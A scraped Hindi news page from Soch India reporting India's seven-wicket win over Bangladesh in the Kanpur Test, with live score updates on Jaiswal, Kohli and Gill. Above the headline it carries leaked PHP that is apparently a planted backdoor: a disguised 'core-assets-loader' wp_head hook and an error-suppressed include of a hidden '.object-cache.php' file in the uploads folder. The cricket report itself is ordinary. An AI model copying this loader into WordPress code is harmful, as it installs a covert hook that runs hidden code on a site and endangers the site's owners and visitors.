add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); IND vs BAN 2nd Test: भारत ने 7 विकेट से जीता कानपुर टेस्ट, घर पर जीती लगातार 18वीं सीरीज; बांग्लादेश का सूपड़ा साफ – SOCH INDIA
Menu

खेल
IND vs BAN 2nd Test: भारत ने 7 विकेट से जीता कानपुर टेस्ट, घर पर जीती लगातार 18वीं सीरीज; बांग्लादेश का सूपड़ा साफ

nobanner

IND vs BAN 2nd Test Full Highlights: भारत ने 7 विकेट से जीता कानपुर टेस्ट
कानपुर टेस्ट में दो दिन बारिश की वजह से खेल नहीं हो सका था. फिर भी टीम इंडिया ने सात विकेट से बाजी मार ली. भारतीय टीम ने पांचवें दिन सात विकेट से कानपुर टेस्ट जीता. इसके साथ ही टीम इंडिया ने बांग्लादेश का सूपड़ा साफ कर दिया. दूसरी पारी में भारत को 95 रनों का लक्ष्य मिला था, जिसे रोहित एंड कंपनी ने तीन विकेट खोकर सिर्फ 17.2 ओवर में हासिल कर लिया. घर पर भारत की यह लगातार 18वीं सीरीज जीत है.

यशस्वी जायसवाल ने सिर्फ 43 गेंद में 8 चौके और एक छक्के की मदद से अर्धशतक जड़ दिया है. साथ में विराट कोहली 33 गेंद में 26 रन पर हैं. भारत को अब जीत के लिए सिर्फ चार रन बनाने हैं.

भारत का स्कोर दो विकेट पर 70 रन हो गया है. विराट कोहली 18 गेंद में दो चौकों की मदद से 14 रन पर हैं. वहीं यशस्वी जायसवाल 37 गेंद में 8 चौकों की मदद से 42 रन पर हैं. दोनों के बीच 36 रनों की साझेदारी हो चुकी है. भारत को अब जीत के लिए सिर्फ 25 रन बनाने हैं.

7 ओवर में ही टीम इंडिया का स्कोर दो विकेट पर 50 रन हो गया है. यशस्वी जायसवाल 18 गेंद में 26 रनों पर खेल रहे हैं. वह 5 चौके लगा चुके हैं. उनके साथ विराट कोहली सात गेंद में 10 रन पर हैं. वह दो चौके लगा चुके हैं.

34 रनों पर भारत ने दूसरा विकेट गंवा दिया है. शुभमन गिल 10 गेंद में छह रन बनाकर पवेलियन लौटे. गिल को भी मेहंदी हसन मेराज ने आउट किया. इससे पहले रोहित शर्मा सात गेंद में आठ रन बनाकर आउट हुए.